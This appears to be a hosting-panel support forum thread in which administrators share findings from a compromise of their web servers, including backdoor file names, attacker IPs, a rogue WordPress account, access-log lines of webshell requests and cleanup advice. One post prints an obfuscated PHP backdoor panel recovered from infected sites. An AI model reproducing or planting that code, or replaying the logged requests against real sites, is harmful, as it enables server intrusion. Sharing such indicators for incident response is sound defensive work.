I also found that there a lot of files called index.php, wp-login.php and files just called "c" (without the dot) across my websites. These files were deeply inside some folders of websites I've developed myself. Thankfully I have a clean backup and these files were not there.

licelic.c
I've decoded a "licelic.c" file and it had listed a lot of the infected websites locations encoded in base64 and some weird stuff (can't decode it directly, maybe it is written with another encode type). I copy-pasted it to Cloud.ai that decode it for me and it gave me all the urls that are infected. I tried chatgpt and it gave me nothing in return.
SO "licelic.c" is of extreme importance for you to deobfuscate and evaluate the URLs that are there. This file exposes the folders that were exploited.

Some of its contents:
Non wordpress website:
[my public url]/folder/folder/folder/index.php?MeL=1#####post_1
[my public url]/folder/folder/folder/index.php?MeL=1#####post_2
[my public url]/folder/folder/folder/index.php?MeL=1#####post_3
[my public url]/folder/folder/folder/index.php?MeL=1#####post_4
[my public url]/folder/folder/folder/index.php?MeL=1#####post_5
[my public url]/folder/folder/folder/index.php?MeL=1#####post_6
[my public url]/folder/folder/folder/index.php?MeL=1#####post_7
[my public url]/folder/folder/folder/index.php?MeL=1#####post_8
...

wordpress website:
[my public url]/folder/folder/folder/index.php/wp-login.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun

"c" file (without the dot)
"c" file (without the dot) is a zip content. You can add ".zip" to this file to open it with a zip application. Inside you get a new file that has a file called "s" that contains obfuscated php code that consists on drawing a form that probably interacts with the expoits. Maybe this is an exploit panel.
I leave the code here
(DO NOT EXECUTE THIS!!!!)
Code: [Select]
<?php
// WARNING: This is MALICIOUS code - DO NOT EXECUTE

// Checks if GET parameter "DEQ" exists
if(!isset($_GET["DEQ"])) exit;

// Function that decodes strings using indices
function Za64HUq_($TYCMzwTO$x6Mpbe) {
    
$iGRCOPT str_split($TYCMzwTO1);
    
$emivt51O explode(","$x6Mpbe);
    
$gMRtx3VD "";
    foreach(
$emivt51O as $v) {
        
$gMRtx3VD .= $iGRCOPT[(int)$v];
    }
    return 
$gMRtx3VD;
}

// Static class with method to initialize arrays
class hCXKOZB {
    public static function 
__callStatic($name$arguments) {
        
$temarr = array(
            
"puTfPFm" => array("3eolcnOp5Qf4_GqphVna1eerd2""10,2,7,1,5"),
            
"CULPcX" => array("eheriQctavFofpceulrwEpy_J5rG""12,19,3,4,7,0"),
            
"mWHO_PtG" => array("arsWrD_pcldbIoeelvh8uae4fc_K""24,8,9,13,2,14")
        );
        foreach(
$temarr as $key => $v) {
            
$GLOBALS[$key] = Za64HUq_($v[0], $v[1]);
        }
    }
}

// Gets values from POST (if they exist)
$vA8r0 = isset($_POST["WOjVxhQ_"]) ? trim($_POST["WOjVxhQ_"]) : "";
$oTlM_Lm47 = isset($_POST["ZXk7oVxn"]) ? trim($_POST["ZXk7oVxn"]) : "";

// Decodes the input
$n3Bi8fy = !empty($oTlM_Lm47) ? $puTfPFm($vA8r0"w") : "";

// If there is a decoded result, writes error message and exits
if($n3Bi8fy) exit("pIUeNv1Ox74Cq0i" $mWHO_PtG($n3Bi8fy));

// Displays HTML form with hidden fields
echo "<form method=\"POST\">";
echo 
"<div><input type=\"text\" name=\"WOjVxhQ_\"></div>";
echo 
"<div><textarea name=\"ZXk7oVxn\" rows=\"5\"></textarea></div>";
echo 
"<button type=\"submit\">submit</button>";
echo 
"</form>";
?>

index.php
This is the index.php deeply inside subfolders were the index file i've created. The root index.php file was replaced by a malicious code that executes the payload and imports my original index file.
So take a deep look on every index file you have (even sub-folders).

These files were touched (date-time changed). Mine dated 30/08/2024 23:06:51

So even if you change your panel or format your server, you'll be hacked again if you don't sanitize every website. This means going throw all files and folders and apply new rules to stop execution on folders that you don't have php files (image uploads for example).

Thank you for proving my point. There are also png looking files containing malicious code with random filename but they are rare. Probably result of an interrupted code with an exception.

11
Those .c files don't appear to be IoC related to the patched CWP vulnerability. Likely they are part of another PHP injection attack -- multiple competing gangs are attempting to compromise servers on any given day. So the recommendation is to harden your PHP install right away, then engage in clean up & full postmortem.

Better to batten down the hatches rather than bailing water out of the ship...

.c files result of the same vulnerability no doubt. Maybe no one noticed because ".c" file is always hidden in a random directory or maybe who used this vulnerability didnt drop a backdoor for your server. I switched to cPanel/WHM after removing all the backdoors.

Where did you find those files? Inside /home or anywere else?

I also have this 198.144.182.13 IP in my logs.
Also found out that he also has created wordpress accounts, this is his data:
user: wpadminerlzp
email: wpadmin@volovmart.ru
date: 2020-06-14 00:00:00 (by looking at this 00:00:00, I assume this was SQL inserted)

Those files were on the public_html folder (or the main folder of that website)
defauit.php
defauIt.php
licelic.c

This file was in the public_html folder for some occurances, but for some occurances it was in a random directory
backup.c

This file was always hidden in some random directory.
.c(yes, just .c)

And I suggest you to check every file named "index.php" because they also add an obfuscated php code. You cant miss when you see it.

And they dont have to guess CWP username to inject code btw.

12
We are not safe at all. Just today our websites affected again.
This exploit was there since 2021, We've checked all the files and found out some unused websites had defauit.php, backup.c and licelic.c files with timestamp showing 2021. And infected websites will always have robots.txt file.
I thought maybe I could fix it myself by editing filemanager but its an obfuscated file. So we decided to move our customers to another panel.

Did you search the access log? Did the attacker exploit the filemanager again?

Yes, with a  "python-requests/2.31.0" signature at the end. Disabling the filemanager wouldnt cut it. Because they also drop backdoor scripts. Some of them:
defauit.php
defauIt.php
backup.c
licelic.c
.c(yes, just .c)
Also there are some .png looking files which they are actually php scripts. So this mess is really time consuming to clean.
And the funny thing is that ModSecurity actually logs those attempts and says its blocked while it is clearly not blocked.



Other examples:
-Attacker disguising as Google, sends id=1 as GET and a POST request: (198.144.182.13 - - [31/Jul/2025:17:08:34 +0300] "POST /defauit.php?id=1 HTTP/1.1" 200 227 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36")

-Attacker can run code via any php file: 162.248.79.101 - - [30/Sep/2025:06:33:32 +0300] "GET /shop.php?l=&ck=32c4dgm3KyzHGUR59ytMXK8gLaaz38t-a-o97bdyvcgg4Ljzk-d-nKZtqg-s--s-&p=&u=&no=32c4dgm3KyzHGUR59ytMXK8gLaaz38t-a-o97bdyvcgg4Ljzk-d-nKZtqg-s--s-&ac=del&path=%2Fhome%2FSENSITIVEDATA%2Fpublic_html%2Fdefauit.php HTTP/1.1" 200 6389 "https://website.com/shop.php?l=&p=&ck=ab5o9BIxWNIxAcVthNjxfAPTh-a-QRgWy3XLNzjjCF01zWEVaQ5xS8rA-s--s-&no=&did=8&tid=8" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36"

-Another one, but sends POST only:  207.154.240.68 - - [30/Sep/2025:14:17:21 +0300] "POST /defauit.php HTTP/1.1" 200 60 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"

13
After that, anything can be changed realy. I notice some plugins changed, and theme files. Also there is a mu-plugin that is created to the redirect.

Location of those changes? Where can i find them?

The attacker have access to every file in your system. It could change anything...
I cannot provide you a "list" of what was changed in your case. Could be just the theme files, or nothing at all - some servers may still have the backdoor placed due to the exploitation of this vulnerability in CWP, but not "activated" - are there just waiting to a request that activates the malicious payload.

The WAF rules provided here can help, but don't fix the problem if your server is already affected.
The good news is that CWP already "silently patched" this vulnerability, so you should be safe from be attacked again if you use CWP.

I didn't check all the WAF rules provided here, but the request is activated with a specific query in a POST request made to the files placed in your server. If you simply access the files, they do nothing.
It should be a request like "domain.xxxx/defaiult.php?t=XXXXXXXXXX" - where XXXXXXXXXX is a specific query.

I did decode the files, and they install a webshell - thats it. What they do after that is from the attacker point of interest.

Unfortunately, if you have been affected by this, you have two options:
- Try to see the files that have been recently changed in your system. Not just the account that is affected, but ALL the system. After that, see if something was malicious changed.
- Don't consider the server safe. Try to deploy your accounts in a fresh new server - and make sure that every single website is also clean. Use something like WordFence, or more abroad, something like CPGuard to scan the accounts.

We are not safe at all. Just today our websites affected again.
This exploit was there since 2021, We've checked all the files and found out some unused websites had defauit.php, backup.c and licelic.c files with timestamp showing 2021. And infected websites will always have robots.txt file.
I thought maybe I could fix it myself by editing filemanager but its an obfuscated file. So we decided to move our customers to another panel.

Pages: [1]